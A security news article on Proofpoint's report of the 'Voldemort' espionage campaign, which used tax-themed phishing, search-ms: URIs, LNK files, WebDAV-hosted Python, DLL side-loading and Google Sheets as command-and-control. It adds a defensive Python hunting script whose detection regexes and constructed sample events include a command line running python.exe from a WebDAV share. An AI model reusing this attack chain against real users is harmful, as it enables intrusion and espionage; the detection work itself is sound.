Researchers at Proofpoint have documented a malware campaign that uses Google Sheets, a widely used cloud spreadsheet application, as a command-and-control (C2) channel. The finding illustrates how threat actors are repurposing legitimate cloud services as attack infrastructure, in what appears to be an espionage operation.
The Discovery and Modus Operandi
The campaign was first detected on August 5, 2024, and has since been linked to a series of phishing attacks impersonating tax authorities from various governments, including those in Europe, Asia, and the United States. The attackers, using a bespoke tool known as “Voldemort,” have targeted over 70 organizations across multiple sectors, including finance, technology, healthcare, and government. The sheer scale of this operation, with more than 20,000 emails sent to potential victims, underscores the potential impact of this threat.
The phishing emails are crafted to appear as urgent communications from tax authorities in countries such as the U.S., U.K., France, Germany, Italy, India, and Japan. These emails typically warn recipients about supposed changes to their tax filings and prompt them to click on a Google AMP Cache URL. This URL redirects the user to an intermediate landing page designed to inspect the User-Agent string of the victim’s browser, determining if the operating system is Windows.
If the system is identified as Windows, the page abuses the search-ms: URI protocol handler, a legitimate Windows Explorer feature rather than a vulnerability, to open an Explorer search window that shows the user a remotely hosted Windows shortcut (LNK) file. The shortcut masquerades as a PDF document, using Adobe Acrobat Reader's icon to deceive the user into thinking it is a legitimate file. Once the LNK file is executed, it starts the multi-stage chain described below.
The Technical Breakdown
Upon execution, the LNK file invokes PowerShell, which runs python.exe from a WebDAV share and passes a Python script hosted on a second WebDAV share as its argument. Because the interpreter, its dependencies and the script are all read over WebDAV, nothing is written to the victim's disk as an ordinary download, which sidesteps antivirus engines that scan files on write. The evasion is not absolute, though: Windows services such UNC paths through the WebClient service, which caches what it fetches under %LOCALAPPDATA%\Temp\TfsStore\Tfs_DAV, and the resulting process tree (explorer.exe launching powershell.exe, which launches python.exe from a \\host@SSL\DavWWWRoot\ path) is highly distinctive in endpoint telemetry.
The Python script’s primary function is to gather system information and send this data, encoded in Base64, to a domain controlled by the attackers. Once this information is exfiltrated, the malware displays a decoy PDF document to the user, maintaining the illusion of legitimacy. Simultaneously, it downloads a password-protected ZIP file from OpenDrive.
This ZIP file contains two components: a legitimate executable, "CiscoCollabHost.exe," and a malicious DLL, "CiscoSparkLauncher.dll," which the executable loads from its own directory. This is a classic DLL side-loading arrangement: the trusted binary's name is what appears in process listings while the DLL's code runs inside it. The DLL is Voldemort itself, a custom backdoor written in C that enables the attackers to gather further information from the compromised system and deploy additional payloads. Voldemort uses Google Sheets for C2, data exfiltration and command execution, which is what makes the campaign hard to detect and mitigate: its traffic goes to a Google-owned domain over TLS that most organizations cannot block, so it passes domain-reputation and URL-filtering controls and can only be separated from legitimate use with process-level context.
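To make the chain above concrete from the defender's side, here is an added example, written for this page and not Proofpoint's or the campaign's code, that runs four hunting rules over constructed Sysmon-style events: explorer.exe handling a search-ms: URI, an interpreter executing from a WebDAV UNC path, an unsigned DLL loaded from the same user-writable directory as its host executable, and a non-browser process connecting to Google Sheets. The hostnames, file paths and user names are made up, the sample events are constructed rather than captured telemetry, and the sheets.googleapis.com and docs.google.com endpoints are assumptions, since the page names the service but not its hostnames.

```python
"""Hunting rules for the execution chain described above, run over constructed
Sysmon-like events. Added example for this page, not Proofpoint's or the
campaign's code; every hostname, path and endpoint below is an assumption."""
import re
from pathlib import PureWindowsPath

# The Windows WebDAV redirector exposes HTTPS shares as \\host@SSL[@port]\DavWWWRoot\...
WEBDAV_UNC = re.compile(r"\\\\[\w.-]+@SSL(?:@\d+)?\\DavWWWRoot\\", re.IGNORECASE)
SEARCH_MS_URI = re.compile(r"\bsearch-ms:", re.IGNORECASE)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "python.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
# Assumed Google Sheets endpoints (the page names the service, not the hostnames).
SHEETS_HOSTS = {"sheets.googleapis.com", "docs.google.com"}
USER_WRITABLE_MARKERS = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def directory(path: str) -> str:
    return str(PureWindowsPath(path).parent).lower()


def match_rules(ev: dict) -> list:
    """Return the names of every rule the event triggers (empty list if benign)."""
    hits = []
    image = ev.get("Image", "")
    kind = ev.get("type")
    if kind == "process_create":
        cmd = ev.get("CommandLine", "")
        # Rule 1: Explorer launched to handle a search-ms: URI (the LNK delivery step).
        if basename(image) == "explorer.exe" and SEARCH_MS_URI.search(cmd):
            hits.append("search_ms_uri_via_explorer")
        # Rule 2: a binary running from a WebDAV share, or a script host handed a
        # WebDAV path (python.exe and its script both served over WebDAV, as in the stager).
        if WEBDAV_UNC.search(image) or (basename(image) in SCRIPT_HOSTS and WEBDAV_UNC.search(cmd)):
            hits.append("exec_from_webdav_share")
    elif kind == "image_load":
        loaded = ev.get("ImageLoaded", "")
        # Rule 3: side-loading candidate: an unsigned DLL in the same user-writable folder
        # as the executable loading it (CiscoCollabHost.exe beside CiscoSparkLauncher.dll).
        if (loaded.lower().endswith(".dll")
                and directory(loaded) == directory(image)
                and any(m in loaded.lower() for m in USER_WRITABLE_MARKERS)
                and str(ev.get("Signed", "false")).lower() != "true"):
            hits.append("unsigned_dll_sideload_candidate")
    elif kind == "network_connect":
        # Rule 4: Google Sheets traffic from anything that is not a browser.
        if ev.get("DestinationHostname", "").lower() in SHEETS_HOSTS and basename(image) not in BROWSERS:
            hits.append("non_browser_to_google_sheets")
    return hits


def hunt(events: list) -> list:
    """Return (event index, rule name) pairs for every rule hit across the events."""
    return [(i, rule) for i, ev in enumerate(events) for rule in match_rules(ev)]


# Constructed sample telemetry (not captured logs); hosts, paths and user names are made up.
SAMPLE_EVENTS = [
    {"type": "process_create", "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Windows\explorer.exe" "search-ms:query=tax%20notice&crumb=location:\\share.example@SSL\DavWWWRoot\docs"'},
    {"type": "process_create", "Image": r"\\share.example@SSL\DavWWWRoot\py\python.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"\\share.example@SSL\DavWWWRoot\py\python.exe \\files.example@SSL\DavWWWRoot\stage.py"},
    {"type": "image_load", "Image": r"C:\Users\ann\AppData\Local\Temp\cisco\CiscoCollabHost.exe",
     "ImageLoaded": r"C:\Users\ann\AppData\Local\Temp\cisco\CiscoSparkLauncher.dll", "Signed": "false"},
    {"type": "network_connect", "Image": r"C:\Users\ann\AppData\Local\Temp\cisco\CiscoCollabHost.exe",
     "DestinationHostname": "sheets.googleapis.com", "DestinationPort": 443},
    # Benign controls that must not fire.
    {"type": "process_create", "Image": r"C:\Python312\python.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": r"C:\Python312\python.exe build.py"},
    {"type": "image_load", "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true"},
    {"type": "network_connect", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationHostname": "docs.google.com", "DestinationPort": 443},
]

if __name__ == "__main__":
    for index, rule in hunt(SAMPLE_EVENTS):
        print(f"event {index}: {rule} ({SAMPLE_EVENTS[index]['Image']})")
```

Each rule is deliberately narrow. Rule 1 fires on Explorer's own command line, so a search-ms: link clicked in a browser is caught regardless of which browser opened it; rule 2 keys on the @SSL\DavWWWRoot\ form the WebDAV redirector produces, so it also covers the port-suffixed @SSL@443 variant; rule 3 needs the DLL and its host in the same user-writable folder, which is the side-loading layout and not how system DLLs load; rule 4 is only as good as the browser allow-list, so on hosts with other legitimate Sheets clients it belongs in a hunting query rather than an alert.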
A Unique Threat in the Cybersecurity Landscape
Proofpoint researchers have described this campaign as an unusual mix of advanced persistent threat (APT) tactics and techniques commonly seen in cybercrime operations. The use of file schema URIs to access external file-sharing resources for malware staging, particularly through WebDAV and Server Message Block (SMB), is a method increasingly popular among malware families that act as initial access brokers (IABs), such as Latrodectus, DarkGate, and XWorm.
The campaign's reliance on Google Sheets as a C2 channel is unusual and reflects where cloud-era threats are heading. Because the traffic goes to a Google-owned domain over TLS that most organizations must permit, it is unlikely to be blocked by domain reputation or URL filtering, and on the wire it looks like ordinary use of Google Workspace; distinguishing it requires knowing which process on the endpoint opened the connection.
Moreover, Proofpoint was able to analyze the contents of the Google Sheets used in this campaign, identifying six confirmed victims. Interestingly, one of these victims is believed to be either a sandbox environment or a known security researcher, suggesting that the attackers may have been testing their tools against more sophisticated defenses.
The Broader Implications
This campaign is emblematic of a broader trend in cybersecurity where threat actors are increasingly using legitimate cloud services for malicious purposes. The blending of sophisticated and rudimentary techniques—referred to by Proofpoint as a “Frankensteinian amalgamation”—complicates efforts to attribute the attacks to a specific group or nation-state. While the campaign bears the hallmarks of cyber espionage, the use of techniques popular in the e-crime landscape suggests that the attackers could have diverse motivations or a hybrid approach to their operations.
The discovery of this campaign comes on the heels of other significant malware developments, such as the latest version of the Latrodectus malware, which has also been observed employing advanced C2 methods and expanding its capabilities. As cyber threats continue to evolve, defenders must remain vigilant and adapt to the increasingly complex and blended tactics employed by malicious actors.
In conclusion, this campaign shows that a trusted SaaS platform can serve as C2 infrastructure and slip past network controls that judge traffic by destination alone. Organizations should pair network monitoring with endpoint telemetry that ties each connection back to the process making it, and treat execution from WebDAV or SMB shares and search-ms: URIs in Explorer command lines as high-signal events, since those are the parts of this chain that do not blend in.